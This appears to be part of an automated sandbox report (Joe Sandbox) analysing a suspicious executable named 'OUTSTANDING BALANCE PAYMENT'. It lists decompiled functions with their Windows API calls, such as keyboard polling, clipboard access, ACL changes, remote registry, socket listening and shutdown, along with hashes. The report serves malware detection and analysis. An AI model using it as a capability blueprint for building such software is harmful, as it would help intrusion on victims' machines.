                                                                  • Opcode Fuzzy Hash: 426d8cb149d9bef493231735361a338ea29042f98d5a1de43f364d8436d128f3
                                                                  • Instruction Fuzzy Hash: 2B31123291121ABBCF15AFA0EC48BDE37AE9F05320F140553E800A22D1DB70CEB58E64
                                                                  Function 00287D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                  • API String ID: 2102423945-2023335898
                                                                  • Opcode ID: cea6eb17a0f291146161f92c892543b0d6514011223d9df8cb86fc8ae6ea6162
                                                                  • Instruction ID: 7df0431ca05b4588835f319f0bfde52748be177ecb4b688fd822af7690b5476e
                                                                  • Opcode Fuzzy Hash: cea6eb17a0f291146161f92c892543b0d6514011223d9df8cb86fc8ae6ea6162
                                                                  • Instruction Fuzzy Hash: F782E075D2521ACBCB24DF94C9807BDFBB1BF48350F2581A9D819AB391E7749DA0CB80
                                                                  Function 002D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 002D09DF
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D09EF
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002D09FB
                                                                  • __wsplitpath.LIBCMT ref: 002D0A59
                                                                  • _wcscat.LIBCMT ref: 002D0A71
                                                                  • _wcscat.LIBCMT ref: 002D0A83
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D0A98
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0AAC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0ADE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0AFF
                                                                  • _wcscpy.LIBCMT ref: 002D0B0B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002D0B4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                  • String ID: *.*
                                                                  • API String ID: 3566783562-438819550
                                                                  • Opcode ID: 37360d12b7462f3201aec70691c25859fc261c6a53d461361f8691e184f3dcae
                                                                  • Instruction ID: e6c119336acb8d5309634228a098178a49c6382dae9d481e98d30122d0b89780
                                                                  • Opcode Fuzzy Hash: 37360d12b7462f3201aec70691c25859fc261c6a53d461361f8691e184f3dcae
                                                                  • Instruction Fuzzy Hash: 0C6159765283059FD710EF60C894AAEB3E8FF89314F04491AF98987252DB31ED55CF92
                                                                  Function 002BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002BABD7
                                                                    • Part of subcall function 002BABBB: GetLastError.KERNEL32(?,002BA69F,?,?,?), ref: 002BABE1
                                                                    • Part of subcall function 002BABBB: GetProcessHeap.KERNEL32(00000008,?,?,002BA69F,?,?,?), ref: 002BABF0
                                                                    • Part of subcall function 002BABBB: HeapAlloc.KERNEL32(00000000,?,002BA69F,?,?,?), ref: 002BABF7
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002BAC0E
                                                                    • Part of subcall function 002BAC56: GetProcessHeap.KERNEL32(00000008,002BA6B5,00000000,00000000,?,002BA6B5,?), ref: 002BAC62
                                                                    • Part of subcall function 002BAC56: HeapAlloc.KERNEL32(00000000,?,002BA6B5,?), ref: 002BAC69
                                                                    • Part of subcall function 002BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002BA6B5,?), ref: 002BAC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002BA6D0
                                                                  • _memset.LIBCMT ref: 002BA6E5
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002BA704
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA715
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 002BA752
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002BA76E
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA78B
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002BA79A
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002BA7A1
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002BA7C2
                                                                  • CopySid.ADVAPI32(00000000), ref: 002BA7C9
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002BA7FA
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002BA820
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002BA834
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 45802a993706a387d9b6934e6d13ff027d884a4248af0b1b103a8fa85aaed988
                                                                  • Instruction ID: c392944802b723c85b44c1ecc097b1825a6eaa8bcebe35ad170fa1ffa539ec3e
                                                                  • Opcode Fuzzy Hash: 45802a993706a387d9b6934e6d13ff027d884a4248af0b1b103a8fa85aaed988
                                                                  • Instruction Fuzzy Hash: 29515A7191020ABFDF05DFA5DC44AEEBBB9FF04340F04812AF915A7290DB349A16CB61
                                                                  Function 00286F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$222 2
                                                                  • API String ID: 0-30713062
                                                                  • Opcode ID: cd419403e592e780f701b1d7d3814a8e3666cd03d222e0ab0696d98e06a19852
                                                                  • Instruction ID: 8822ef43e9f5365d3220ca9be3658b8b53e33481aff05edfc2c2014ef017116a
                                                                  • Opcode Fuzzy Hash: cd419403e592e780f701b1d7d3814a8e3666cd03d222e0ab0696d98e06a19852
                                                                  • Instruction Fuzzy Hash: 5472A075E1621ADBDB15DF58C8907AEB7B5BF08310F24816AE805EB6C0DB709E91CF90
                                                                  Function 002C63F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C5FA6,?), ref: 002C6ED8
                                                                    • Part of subcall function 002C72CB: GetFileAttributesW.KERNEL32(?,002C6019), ref: 002C72CC
                                                                  • _wcscat.LIBCMT ref: 002C6441
                                                                  • __wsplitpath.LIBCMT ref: 002C645F
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002C6474
                                                                  • _wcscpy.LIBCMT ref: 002C64A3
                                                                  • _wcscat.LIBCMT ref: 002C64B8
                                                                  • _wcscat.LIBCMT ref: 002C64CA
                                                                  • DeleteFileW.KERNEL32(?), ref: 002C64DA
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002C64EB
                                                                  • FindClose.KERNEL32(00000000), ref: 002C6506
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                  • String ID: \*.*$p1#v`K$v
                                                                  • API String ID: 2643075503-1732502266
                                                                  • Opcode ID: f7a365d32e40b45eb82059529122a1d78e20bef80bd7b44e9c20ec0261b3efff
                                                                  • Instruction ID: 6945f590b13696d6d6e22480dfbf3efa99a6af620cfd3656ff053798f4483d18
                                                                  • Opcode Fuzzy Hash: f7a365d32e40b45eb82059529122a1d78e20bef80bd7b44e9c20ec0261b3efff
                                                                  • Instruction Fuzzy Hash: EC3191B24183849AC331DBE48889EDBB7DCAF56310F404A1FF5D9C3142EA35D5198BA7
                                                                  Function 002E31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E328E
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002E332D
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002E33C5
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002E3604
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E3611
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: 9724cc2b07e1fed2e9527d2171c06a8d33ce4226b49628a48abcb7381f5c654c
                                                                  • Instruction ID: a72bf4c6419779e48ccae0a15d6ef9e386e1e5691debf4e85d1edc283c2350ab
                                                                  • Opcode Fuzzy Hash: 9724cc2b07e1fed2e9527d2171c06a8d33ce4226b49628a48abcb7381f5c654c
                                                                  • Instruction Fuzzy Hash: C2E15835615240AFCB15EF29C895E2ABBE8EF88710F44886DF44ADB2A1CB30ED15CF51
                                                                  Function 002C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 002C2B5F
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 002C2BE0
                                                                  • GetKeyState.USER32(000000A0), ref: 002C2BFB
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 002C2C15
                                                                  • GetKeyState.USER32(000000A1), ref: 002C2C2A
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 002C2C42
                                                                  • GetKeyState.USER32(00000011), ref: 002C2C54
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 002C2C6C
                                                                  • GetKeyState.USER32(00000012), ref: 002C2C7E
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 002C2C96
                                                                  • GetKeyState.USER32(0000005B), ref: 002C2CA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: a2caf77192f6e6d6bd8f6201864ca260eb6527cac9bb2e1c913e81c583d26ced
                                                                  • Instruction ID: 9d9f5bf389e222fc3f92235b5074e8b9cf886a298e98c3097c6e5907d5f1c377
                                                                  • Opcode Fuzzy Hash: a2caf77192f6e6d6bd8f6201864ca260eb6527cac9bb2e1c913e81c583d26ced
                                                                  • Instruction Fuzzy Hash: 2141C4305147CBA9FF359F608814BA9BEA06F12308F04425FD9C6562C1DFA49EECC7A2
                                                                  Function 002D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 4a951aba056708c724381485a9c56d95bb5e4e88dc7793fb6bf04121e8ed01b9
                                                                  • Instruction ID: 1382a91db9cc80b4a03b6dea0e9534b377a7f369d23a40b0f10cdbad6a7ea717
                                                                  • Opcode Fuzzy Hash: 4a951aba056708c724381485a9c56d95bb5e4e88dc7793fb6bf04121e8ed01b9
                                                                  • Instruction Fuzzy Hash: 52218B31321214AFDB12AFA4EC59B2D77E9EF04710F04841BF94A9B2A1CB71EC108F50
                                                                  Function 002DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002B9ABF: CLSIDFromProgID.OLE32 ref: 002B9ADC
                                                                    • Part of subcall function 002B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 002B9AF7
                                                                    • Part of subcall function 002B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 002B9B05
                                                                    • Part of subcall function 002B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002B9B15
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002DC235
                                                                  • _memset.LIBCMT ref: 002DC242
                                                                  • _memset.LIBCMT ref: 002DC360
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 002DC38C
                                                                  • CoTaskMemFree.OLE32(?), ref: 002DC397
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 002DC3E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
                                                                  • Opcode ID: 07eaee4772e3c203411b34d6b7506210c42132c3133ed8204986c0240fd59f9c
                                                                  • Instruction ID: 3e223c4e72f762fbf1d13d038a695d1ed6bc0caa0b7245c2fb31db55d7bacb51
                                                                  • Opcode Fuzzy Hash: 07eaee4772e3c203411b34d6b7506210c42132c3133ed8204986c0240fd59f9c
                                                                  • Instruction Fuzzy Hash: 76916C71D11219EBDB10DFA4DC95EEEBBB8EF08310F20815AF519A7281DB709A55CFA0
                                                                  Function 002C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
                                                                    • Part of subcall function 002BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
                                                                    • Part of subcall function 002BB134: GetLastError.KERNEL32 ref: 002BB1BA
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 002C7A0F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 136524cbcfface99320c26004455ec285a10c337268d386d6624cd9fd9db8568
                                                                  • Instruction ID: 0fbeff65c40acfb4bd7b985d61a28889e2bb9f8f5fe839891aa29c28af17bd2d
                                                                  • Opcode Fuzzy Hash: 136524cbcfface99320c26004455ec285a10c337268d386d6624cd9fd9db8568
                                                                  • Instruction Fuzzy Hash: 9501F7716792126BF72D2A78CC5AFBF325C9B00340F240A2DFD03A20D2D6A09E2089A0
                                                                  Function 002D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002D8CA8
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8CB7
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 002D8CD3
                                                                  • listen.WSOCK32(00000000,00000005), ref: 002D8CE2
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8CFC
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 002D8D10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: ba9b45b22ebadc7f989e433e051c42b88fc5e9262631adacf64a6784c6a80f35
                                                                  • Instruction ID: f58761d9c03c61a533695b538620efe00cbd91f1b9a5ac6d8a783eba01b62798
                                                                  • Opcode Fuzzy Hash: ba9b45b22ebadc7f989e433e051c42b88fc5e9262631adacf64a6784c6a80f35
                                                                  • Instruction Fuzzy Hash: 0021EF31621201EFCB15EF68CC95B6EB7E9EF48720F10815AF916AB3D2CB70AD518B51
                                                                  Function 002C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002C6554
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002C6564
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 002C6583
                                                                  • __wsplitpath.LIBCMT ref: 002C65A7
                                                                  • _wcscat.LIBCMT ref: 002C65BA
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002C65F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1605983538-0
                                                                  • Opcode ID: 8230cbe3032f68ba84e8a41c6c49002b708b63332a3dad8f0e2f15411b8f5c90
                                                                  • Instruction ID: 94f6abf9e896b1ab90e520fb5b81b107068a5fe7f7e98b1893e0aeb457ab8689
                                                                  • Opcode Fuzzy Hash: 8230cbe3032f68ba84e8a41c6c49002b708b63332a3dad8f0e2f15411b8f5c90
                                                                  • Instruction Fuzzy Hash: B3217171910219ABDB11AFA4CC88FD9B7FCAB09340F5001AAE505E3141DB719B95CF61
                                                                  Function 00289B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$2
                                                                  • API String ID: 0-1459993113
                                                                  • Opcode ID: 0302ee028f4449baae43b50974c7edbf9e636cae510cfa3739152f53ad4b9bde
                                                                  • Instruction ID: 24f658e499132167900d60994e984b63a704aebb1c246e11fde6eaa561a36bed
                                                                  • Opcode Fuzzy Hash: 0302ee028f4449baae43b50974c7edbf9e636cae510cfa3739152f53ad4b9bde
                                                                  • Instruction Fuzzy Hash: 4E92D274E2221ACBEF25DF58C8507BDB7B1BB54310F19829AE816A72C0D7709D91CF91
                                                                  Function 002C13CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
